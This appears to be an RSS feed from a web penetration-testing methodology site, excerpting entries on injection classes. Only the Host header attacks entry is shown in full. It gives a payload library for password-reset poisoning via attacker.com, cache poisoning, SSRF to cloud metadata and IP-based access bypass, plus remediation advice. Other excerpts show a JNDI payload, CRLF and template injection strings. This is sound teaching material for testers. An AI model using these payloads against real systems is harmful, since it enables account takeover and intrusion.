Input Injection on MrAzoth https://az0th.it/web/input/ Recent content in Input Injection on MrAzoth Hugo -- 0.154.5 en-us Tue, 24 Feb 2026 00:00:00 +0000 Blind XSS: Detection, Delivery & Exfiltration https://az0th.it/web/input/023-input-xss-blind/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/023-input-xss-blind/ <h1 id="blind-xss-detection-delivery--exfiltration">Blind XSS: Detection, Delivery &amp; Exfiltration</h1> <blockquote> <p><strong>Severity</strong>: Critical (targets privileged users) <strong>CWE</strong>: CWE-79 | <strong>OWASP</strong>: A03:2021 <strong>Reference</strong>: <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</a></p> </blockquote> <hr> <h2 id="what-is-blind-xss">What Is Blind XSS?</h2> <p>Blind XSS is a subtype of stored XSS where the payload fires in a context <strong>you cannot directly observe</strong>: an admin panel, an internal log viewer, a support dashboard, a PDF report renderer, or an email client. You inject it and wait — when the privileged user loads the page, you receive a callback.</p> Client-Side Template Injection (CSTI) https://az0th.it/web/input/008-input-csti/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/008-input-csti/ <h1 id="client-side-template-injection-csti">Client-Side Template Injection (CSTI)</h1> <blockquote> <p><strong>Severity</strong>: High | <strong>CWE</strong>: CWE-79, CWE-94 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-csti">What Is CSTI?</h2> <p>Client-Side Template Injection occurs when user input is interpolated directly into a <strong>client-side template engine</strong> (AngularJS, Vue.js, Handlebars, Mavo, etc.) without sanitization. Unlike XSS where you inject HTML/JS directly, CSTI injects template syntax that the framework itself evaluates — often <strong>bypassing XSS filters</strong> that sanitize HTML but not template delimiters.</p> <pre tabindex="0"><code>AngularJS app renders: &lt;div ng-app&gt;Hello {{username}}&lt;/div&gt; Username = &#34;{{7*7}}&#34; Rendered: Hello 49 ← template evaluated → CSTI confirmed Escalate: username = &#34;{{constructor.constructor(&#39;alert(1)&#39;)()}}&#34; </code></pre><p>CSTI is particularly powerful against apps that use AngularJS with <code>ng-app</code> on a wide DOM scope — because the <strong>AngularJS sandbox escape</strong> gives full JavaScript execution.</p> DOM XSS: Source-to-Sink Tracing & Encoding Bypass https://az0th.it/web/input/022-input-xss-dom/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/022-input-xss-dom/ <h1 id="dom-xss-source-to-sink-tracing--encoding-bypass">DOM XSS: Source-to-Sink Tracing &amp; Encoding Bypass</h1> <blockquote> <p><strong>Severity</strong>: High | <strong>CWE</strong>: CWE-79 | <strong>OWASP</strong>: A03:2021 <strong>Reference</strong>: <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</a></p> </blockquote> <hr> <h2 id="why-dom-xss-evades-server-side-sanitization">Why DOM XSS Evades Server-Side Sanitization</h2> <p>The payload <strong>never reaches the server</strong>. It goes from a URL source (e.g., <code>location.hash</code>) directly to a dangerous sink (e.g., <code>innerHTML</code>) entirely in browser JavaScript. Server-side sanitization, WAFs inspecting HTTP traffic, and traditional scanners all miss it.</p> <p>The attack surface is the JavaScript code itself — you must read it.</p> Expression Language Injection (EL / SpEL) https://az0th.it/web/input/010-input-el-injection/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/010-input-el-injection/ <h1 id="expression-language-injection-el--spel">Expression Language Injection (EL / SpEL)</h1> <blockquote> <p><strong>Severity</strong>: Critical | <strong>CWE</strong>: CWE-917 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-expression-language-injection">What Is Expression Language Injection?</h2> <p>Expression Language (EL) is used in Java-based frameworks to bind data between UI and business logic. When user input is evaluated as an EL expression, the attacker gains access to the full Java runtime — leading to RCE. Two distinct attack surfaces:</p> <p><strong>Java EL (JSP/JSF/Jakarta EE)</strong>:</p> <ul> <li>Used in <code>${...}</code> and <code>#{...}</code> contexts in <code>.jsp</code>, <code>.jsf</code>, <code>.xhtml</code> files</li> <li>Evaluated server-side by the EL runtime (JUEL, Eclipse Mojarra, etc.)</li> <li>Access to <code>Runtime</code>, <code>ProcessBuilder</code>, class loading chain</li> </ul> <p><strong>Spring SpEL (Spring Expression Language)</strong>:</p> GraphQL Injection https://az0th.it/web/input/018-input-graphql-injection/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/018-input-graphql-injection/ <h1 id="graphql-injection">GraphQL Injection</h1> <blockquote> <p><strong>Severity</strong>: Critical | <strong>CWE</strong>: CWE-89, CWE-78, CWE-918 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-graphql-injection">What Is GraphQL Injection?</h2> <p>GraphQL injection is distinct from GraphQL-level abuse (rate limiting, introspection, DoS — covered in Chapter 83). This chapter focuses on <strong>second-order injection through GraphQL resolvers</strong>: the SQL, command, SSTI, NoSQL, or SSRF payloads that flow through GraphQL arguments into backend systems that trust them.</p> <p>GraphQL arguments bypass many traditional WAF rules because:</p> <ol> <li>The payload is inside JSON with a GraphQL-specific syntax</li> <li>Nested fields and aliases obscure the injection point</li> <li>GraphQL variables allow multi-step payload delivery</li> <li>Batch/alias attacks multiply the injection surface</li> </ol> <pre tabindex="0"><code>GraphQL injection path: { users(search: &#34;&#39; OR &#39;1&#39;=&#39;1&#34;) { id email } } ↓ Resolver: db.query(`SELECT * FROM users WHERE name = &#39;${args.search}&#39;`) ↓ SQL injection via resolver argument </code></pre><hr> <h2 id="discovery-checklist">Discovery Checklist</h2> <p><strong>Phase 1 — Enumerate Injection Points</strong></p> Host Header Attacks https://az0th.it/web/input/017-input-host-header/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/017-input-host-header/ <h1 id="host-header-attacks">Host Header Attacks</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-20, CWE-601 <strong>OWASP</strong>: A05:2021 – Security Misconfiguration</p> </blockquote> <hr> <h2 id="what-are-host-header-attacks">What Are Host Header Attacks?</h2> <p>The HTTP <code>Host</code> header tells the server which virtual host to serve. Applications that trust <code>Host</code> blindly for link generation, password reset emails, routing, or cache keying are vulnerable. Manipulation leads to: password reset poisoning, cache poisoning, SSRF, routing bypass, and XSS.</p> <pre tabindex="0"><code>GET /reset-password?token=abc123 HTTP/1.1 Host: attacker.com ← injected App sends email: &#34;Click: https://attacker.com/reset?token=abc123&#34; Victim clicks → attacker receives token → account takeover </code></pre><hr> <h2 id="discovery-checklist">Discovery Checklist</h2> <ul> <li><input disabled="" type="checkbox"> Modify <code>Host:</code> to an attacker-controlled domain — check if reflected in response/emails</li> <li><input disabled="" type="checkbox"> Test <code>X-Forwarded-Host:</code>, <code>X-Host:</code>, <code>X-Forwarded-Server:</code>, <code>X-HTTP-Host-Override:</code></li> <li><input disabled="" type="checkbox"> Test with port appended: <code>Host: target.com:evil.com</code></li> <li><input disabled="" type="checkbox"> Test password reset flow with poisoned Host header</li> <li><input disabled="" type="checkbox"> Check if Host is used to generate absolute URLs in HTML/JSON responses</li> <li><input disabled="" type="checkbox"> Test cache poisoning via unkeyed Host header</li> <li><input disabled="" type="checkbox"> Test with duplicate <code>Host:</code> headers</li> <li><input disabled="" type="checkbox"> Test absolute-form request URI with different Host header</li> <li><input disabled="" type="checkbox"> Test routing bypass to internal services via Host manipulation</li> <li><input disabled="" type="checkbox"> Test <code>X-Forwarded-For</code> + <code>X-Real-IP</code> for IP-based auth bypass</li> <li><input disabled="" type="checkbox"> Check for SSRF via Host header (internal service routing)</li> </ul> <hr> <h2 id="payload-library">Payload Library</h2> <h3 id="attack-1--password-reset-poisoning">Attack 1 — Password Reset Poisoning</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Step 1: Request password reset for victim account</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Step 2: Intercept request, modify Host header to attacker-controlled domain</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>POST /forgot-password HTTP/1.1 </span></span><span style="display:flex;"><span>Host: attacker.com ← poisoned </span></span><span style="display:flex;"><span>Content-Type: application/x-www-form-urlencoded </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>email<span style="color:#f92672">=</span>victim@corp.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># App generates: https://attacker.com/reset?token=VICTIM_TOKEN</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Victim receives email, clicks link → token delivered to attacker.com</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Attacker uses token to reset victim&#39;s password</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Alternative override headers to test:</span> </span></span><span style="display:flex;"><span>POST /forgot-password HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>X-Forwarded-Host: attacker.com ← many frameworks prefer this </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>POST /forgot-password HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>X-Host: attacker.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>POST /forgot-password HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>X-Forwarded-Server: attacker.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Via port injection — Host: target.com:@attacker.com</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Some parsers treat :@ as userinfo separator</span> </span></span><span style="display:flex;"><span>Host: target.com:@attacker.com </span></span></code></pre></div><h3 id="attack-2--web-cache-poisoning-via-host-header">Attack 2 — Web Cache Poisoning via Host Header</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># If cache key doesn&#39;t include Host header (unkeyed header):</span> </span></span><span style="display:flex;"><span>GET / HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>X-Forwarded-Host: attacker.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># App generates response with:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># &lt;script src=&#34;https://attacker.com/app.js&#34;&gt;&lt;/script&gt;</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Cache stores this under the key for target.com/</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># All subsequent users get the poisoned response (XSS)</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Or via Host header directly if cache doesn&#39;t normalize:</span> </span></span><span style="display:flex;"><span>GET / HTTP/1.1 </span></span><span style="display:flex;"><span>Host: attacker.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Check if X-Cache: HIT on second request → cached with poisoned Host</span> </span></span><span style="display:flex;"><span>curl -s -I https://target.com/ -H <span style="color:#e6db74">&#34;X-Forwarded-Host: attacker.com&#34;</span> | grep -i <span style="color:#e6db74">&#34;x-cache\|location&#34;</span> </span></span></code></pre></div><h3 id="attack-3--routing-to-internal-services">Attack 3 — Routing to Internal Services</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Virtual host routing — different Host routes to different backend:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Normal: Host: target.com → public app</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Internal: Host: internal.admin → admin panel</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>GET /admin HTTP/1.1 </span></span><span style="display:flex;"><span>Host: internal.admin </span></span><span style="display:flex;"><span><span style="color:#75715e"># If proxy routes by Host header and doesn&#39;t enforce allowlist:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># → May access internal admin panel</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Try common internal Host values:</span> </span></span><span style="display:flex;"><span>Host: localhost </span></span><span style="display:flex;"><span>Host: 127.0.0.1 </span></span><span style="display:flex;"><span>Host: internal </span></span><span style="display:flex;"><span>Host: admin </span></span><span style="display:flex;"><span>Host: admin.target.com </span></span><span style="display:flex;"><span>Host: internal.target.com </span></span><span style="display:flex;"><span>Host: staging.target.com </span></span><span style="display:flex;"><span>Host: dev.target.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Absolute request URI bypass:</span> </span></span><span style="display:flex;"><span>GET http://internal.service/admin HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span><span style="color:#75715e"># The absolute URI takes precedence over Host in some proxies</span> </span></span></code></pre></div><h3 id="attack-4--duplicate-host-header">Attack 4 — Duplicate Host Header</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Some servers use first Host, some use last, some concatenate:</span> </span></span><span style="display:flex;"><span>GET / HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>Host: attacker.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test which value is reflected in response or used for routing</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># WAF may check first, app may use second</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Host header with double value (inline):</span> </span></span><span style="display:flex;"><span>Host: target.com, attacker.com </span></span><span style="display:flex;"><span>Host: target.com attacker.com <span style="color:#75715e"># space-separated</span> </span></span></code></pre></div><h3 id="attack-5--ssrf-via-host-header">Attack 5 — SSRF via Host Header</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># If server uses Host header to make server-side requests:</span> </span></span><span style="display:flex;"><span>GET / HTTP/1.1 </span></span><span style="display:flex;"><span>Host: 169.254.169.254 <span style="color:#75715e"># AWS metadata</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>GET / HTTP/1.1 </span></span><span style="display:flex;"><span>Host: internal-api:8080 <span style="color:#75715e"># internal service</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>GET / HTTP/1.1 </span></span><span style="display:flex;"><span>Host: collaborator.oast.pro <span style="color:#75715e"># OOB detection</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># With port manipulation:</span> </span></span><span style="display:flex;"><span>Host: target.com:80@169.254.169.254 <span style="color:#75715e"># userinfo injection</span> </span></span></code></pre></div><h3 id="attack-6--x-forwarded-for-ip-bypass">Attack 6 — X-Forwarded-For IP Bypass</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Bypass IP-based restrictions (admin panel requires 127.0.0.1):</span> </span></span><span style="display:flex;"><span>GET /admin HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>X-Forwarded-For: 127.0.0.1 </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>GET /admin HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>X-Real-IP: 127.0.0.1 </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>GET /admin HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>X-Originating-IP: 127.0.0.1 </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>GET /admin HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>Client-IP: 127.0.0.1 </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>GET /admin HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>True-Client-IP: 127.0.0.1 </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>GET /admin HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>Forwarded: <span style="color:#66d9ef">for</span><span style="color:#f92672">=</span>127.0.0.1;by<span style="color:#f92672">=</span>127.0.0.1;host<span style="color:#f92672">=</span>target.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Bypass rate limits — change IP per request:</span> </span></span><span style="display:flex;"><span>X-Forwarded-For: 1.2.3.4 <span style="color:#75715e"># rotate through IPs</span> </span></span><span style="display:flex;"><span>X-Forwarded-For: 10.0.0.1 </span></span></code></pre></div><hr> <h2 id="tools">Tools</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Burp Suite:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Proxy → all requests → add/modify Host header</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Repeater for manual testing</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Param Miner extension (BApp): discovers unkeyed headers including Host variants</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Active Scan for Host header injection</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Param Miner (Burp extension):</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Right-click request → Extensions → Param Miner → Guess Headers</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Automatically discovers reflected/unkeyed headers</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># curl with custom Host:</span> </span></span><span style="display:flex;"><span>curl -s -H <span style="color:#e6db74">&#34;Host: attacker.com&#34;</span> https://target.com/ | grep -i <span style="color:#e6db74">&#34;attacker&#34;</span> </span></span><span style="display:flex;"><span>curl -s -H <span style="color:#e6db74">&#34;X-Forwarded-Host: attacker.com&#34;</span> https://target.com/ | grep -i <span style="color:#e6db74">&#34;attacker&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Check password reset email generation:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Use Burp Collaborator as Host value, trigger password reset,</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># check Collaborator for incoming DNS/HTTP (confirms Host is used in email)</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test all override headers at once:</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> header in <span style="color:#e6db74">&#34;X-Forwarded-Host&#34;</span> <span style="color:#e6db74">&#34;X-Host&#34;</span> <span style="color:#e6db74">&#34;X-HTTP-Host-Override&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;X-Forwarded-Server&#34;</span> <span style="color:#e6db74">&#34;X-Original-Host&#34;</span>; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Testing: </span>$header<span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span> curl -s -H <span style="color:#e6db74">&#34;</span>$header<span style="color:#e6db74">: attacker.oast.pro&#34;</span> https://target.com/ | <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> grep -i <span style="color:#e6db74">&#34;attacker&#34;</span> | head -2 </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Collaborator-based detection:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Set Host to your Collaborator ID, trigger various actions,</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># monitor for DNS/HTTP callbacks</span> </span></span></code></pre></div><hr> <h2 id="remediation-reference">Remediation Reference</h2> <ul> <li><strong>Hardcode the expected hostname</strong>: configure web framework with <code>ALLOWED_HOSTS</code> (Django), <code>server_name</code> (Nginx), <code>ServerName</code> (Apache) — reject any other Host value</li> <li><strong>Never trust <code>X-Forwarded-Host</code></strong> for URL generation unless behind a known trusted proxy</li> <li><strong>Generate absolute URLs from configuration</strong>, not from the request&rsquo;s Host header</li> <li><strong>Cache key discipline</strong>: ensure Host (and override headers) are either in cache key or stripped before caching</li> <li><strong>IP allowlist enforcement</strong>: don&rsquo;t rely solely on <code>X-Forwarded-For</code> for IP-based access control — verify at network layer</li> <li><strong>Password reset links</strong>: use relative paths or server-configured base URL — never construct from Host header</li> </ul> <p><em>Part of the Web Application Penetration Testing Methodology series.</em></p> HTTP Header Injection / Response Splitting https://az0th.it/web/input/014-input-http-header-injection/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/014-input-http-header-injection/ <h1 id="http-header-injection--response-splitting">HTTP Header Injection / Response Splitting</h1> <blockquote> <p><strong>Severity</strong>: High | <strong>CWE</strong>: CWE-113, CWE-74 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-http-header-injection">What Is HTTP Header Injection?</h2> <p>HTTP header injection occurs when user-controlled data is inserted into HTTP response headers without proper sanitization. CRLF sequences (<code>\r\n</code> / <code>%0d%0a</code>) terminate the current header and inject new ones — enabling <strong>response splitting</strong>, <strong>cache poisoning</strong>, <strong>session fixation</strong>, and <strong>XSS</strong> via injected HTML body.</p> <pre tabindex="0"><code>Vulnerable redirect: Location: https://target.com/redirect?url=USER_INPUT Injected input: attacker.com\r\nSet-Cookie: session=EVIL Response becomes: HTTP/1.1 302 Found Location: https://target.com/redirect?url=attacker.com Set-Cookie: session=EVIL ← injected new header </code></pre><p><strong>Response Splitting</strong> (HTTP/1.1): inject <code>\r\n\r\n</code> to terminate headers and start injected body:</p> HTTP Parameter Pollution (HPP) https://az0th.it/web/input/015-input-http-param-pollution/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/015-input-http-param-pollution/ <h1 id="http-parameter-pollution-hpp">HTTP Parameter Pollution (HPP)</h1> <blockquote> <p><strong>Severity</strong>: Medium–High | <strong>CWE</strong>: CWE-235, CWE-20 <strong>OWASP</strong>: A03:2021 – Injection | A01:2021 – Broken Access Control</p> </blockquote> <hr> <h2 id="what-is-http-parameter-pollution">What Is HTTP Parameter Pollution?</h2> <p>HTTP Parameter Pollution exploits the inconsistent behavior of web servers and application frameworks when handling <strong>duplicate parameter names</strong> in HTTP requests. When <code>?id=1&amp;id=2</code> is received, different technologies resolve the conflict differently — and the attacker can exploit the gap between what the WAF/front-end sees and what the back-end application processes.</p> IMAP/SMTP Header Injection https://az0th.it/web/input/013-input-mail-injection/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/013-input-mail-injection/ <h1 id="imapsmtp-header-injection">IMAP/SMTP Header Injection</h1> <blockquote> <p><strong>Severity</strong>: Medium–High | <strong>CWE</strong>: CWE-93, CWE-20 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-mail-injection">What Is Mail Injection?</h2> <p>Mail injection occurs when user-controlled data is inserted into email headers (To, CC, BCC, Subject, From) or SMTP commands without sanitization. A CRLF sequence (<code>\r\n</code>) in an email header terminates the current header and injects new headers — allowing attackers to:</p> <ul> <li><strong>Add BCC recipients</strong> — send to arbitrary addresses (spam amplification)</li> <li><strong>Inject additional To/CC</strong> — mass mailing abuse</li> <li><strong>Override From</strong> — phishing from trusted domain</li> <li><strong>Inject SMTP commands</strong> — in raw SMTP injection scenarios</li> <li><strong>Add arbitrary headers</strong> — X-Mailer manipulation, content injection</li> </ul> <p><strong>IMAP injection</strong> targets IMAP protocol commands when user input is interpolated into IMAP queries (less common, covered in Phase 2).</p> Integer Overflow, Type Juggling & Type Confusion https://az0th.it/web/input/019-input-integer-type-juggling/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/019-input-integer-type-juggling/ <h1 id="integer-overflow-type-juggling--type-confusion">Integer Overflow, Type Juggling &amp; Type Confusion</h1> <blockquote> <p><strong>Severity</strong>: Medium–Critical | <strong>CWE</strong>: CWE-190, CWE-843, CWE-704 <strong>OWASP</strong>: A03:2021 – Injection | A04:2021 – Insecure Design</p> </blockquote> <hr> <h2 id="what-are-these-vulnerabilities">What Are These Vulnerabilities?</h2> <p>Three related but distinct classes of numeric/type confusion vulnerabilities in web applications:</p> <p><strong>Integer Overflow</strong>: arithmetic wraps around when exceeding the integer type&rsquo;s maximum value. Common in C extensions, Go, Rust FFI, and server-side quantity/price calculations.</p> <p><strong>PHP Type Juggling</strong>: PHP&rsquo;s loose comparison (<code>==</code>) coerces types before comparing — <code>&quot;0e12345&quot; == &quot;0e67890&quot;</code> is <code>true</code> (both are scientific notation for 0), <code>0 == &quot;anything_non_numeric&quot;</code> is <code>true</code> in PHP &lt; 8, <code>&quot;1&quot; == true</code> is <code>true</code>.</p> LDAP Injection https://az0th.it/web/input/003-input-ldap-injection/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/003-input-ldap-injection/ <h1 id="ldap-injection">LDAP Injection</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-90 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-ldap-injection">What Is LDAP Injection?</h2> <p>LDAP (Lightweight Directory Access Protocol) is used for authentication and directory lookup in enterprise environments — Active Directory, OpenLDAP, Oracle Directory Server. LDAP injection occurs when user input is inserted into LDAP filter queries without sanitization, allowing filter logic manipulation.</p> <pre tabindex="0"><code>LDAP filter syntax: (&amp;(uid=USERNAME)(password=PASSWORD)) ← AND: both must match Injection: Username: admin)(&amp; Filter becomes: (&amp;(uid=admin)(&amp;)(password=anything)) ↑ always-true subfilter → auth bypass </code></pre><p>Two attack modes:</p> Log Injection & Log4Shell Pattern https://az0th.it/web/input/012-input-log4shell/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/012-input-log4shell/ <h1 id="log-injection--log4shell-pattern">Log Injection &amp; Log4Shell Pattern</h1> <blockquote> <p><strong>Severity</strong>: Critical | <strong>CWE</strong>: CWE-117, CWE-74 <strong>OWASP</strong>: A03:2021 – Injection | A06:2021 – Vulnerable and Outdated Components</p> </blockquote> <hr> <h2 id="what-is-log-injection--log4shell-pattern">What Is Log Injection / Log4Shell Pattern?</h2> <p><strong>Log Injection</strong> — embedding control characters or escape sequences in log entries to corrupt log files, inject fake entries, or exploit log viewers.</p> <p><strong>Log4Shell pattern</strong> — when a logging library performs <strong>JNDI lookups</strong> on log messages, attacker-controlled strings like <code>${jndi:ldap://attacker.com/x}</code> trigger remote code execution. While Log4j2 was the major case, the JNDI injection pattern extends to <strong>any Java logging that interpolates log data</strong>.</p> NoSQL Injection https://az0th.it/web/input/002-input-nosqli/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/002-input-nosqli/ <h1 id="nosql-injection">NoSQL Injection</h1> <blockquote> <p><strong>Severity</strong>: Critical | <strong>CWE</strong>: CWE-943 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-nosql-injection">What Is NoSQL Injection?</h2> <p>NoSQL databases (MongoDB, CouchDB, Redis, Cassandra, Elasticsearch) use query languages different from SQL — often JSON/BSON objects or key-value structures. Injection occurs when user input is interpreted as <strong>query operators</strong> rather than data. MongoDB is the most commonly exploited.</p> <pre tabindex="0"><code>SQL analog: SELECT * FROM users WHERE user = &#39;admin&#39; AND pass = &#39;INJECTED&#39;; MongoDB analog (operator injection): db.users.find({ user: &#34;admin&#34;, pass: {$gt: &#34;&#34;} }) // $gt: &#34;&#34; → password &gt; empty string → matches any non-empty password </code></pre><p>Two main injection styles:</p> Open Redirect https://az0th.it/web/input/016-input-open-redirect/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/016-input-open-redirect/ <h1 id="open-redirect">Open Redirect</h1> <blockquote> <p><strong>Severity</strong>: Medium–High | <strong>CWE</strong>: CWE-601 <strong>OWASP</strong>: A01:2021 – Broken Access Control</p> </blockquote> <hr> <h2 id="what-is-open-redirect">What Is Open Redirect?</h2> <p>An open redirect occurs when an application uses user-controlled input to construct a redirect URL without proper validation. Direct impact is limited (phishing), but open redirects are critical as <strong>chain links</strong> for OAuth token theft, SSRF bypass, and CSP bypass.</p> <pre tabindex="0"><code>https://trusted.com/redirect?url=https://attacker.com/phishing ↑ User trusts trusted.com domain in URL bar → follows redirect → lands on attacker site </code></pre><p><strong>High-impact chains</strong>:</p> OS Command Injection https://az0th.it/web/input/006-input-cmdi/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/006-input-cmdi/ <h1 id="os-command-injection">OS Command Injection</h1> <blockquote> <p><strong>Severity</strong>: Critical <strong>CWE</strong>: CWE-78 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-command-injection">What Is Command 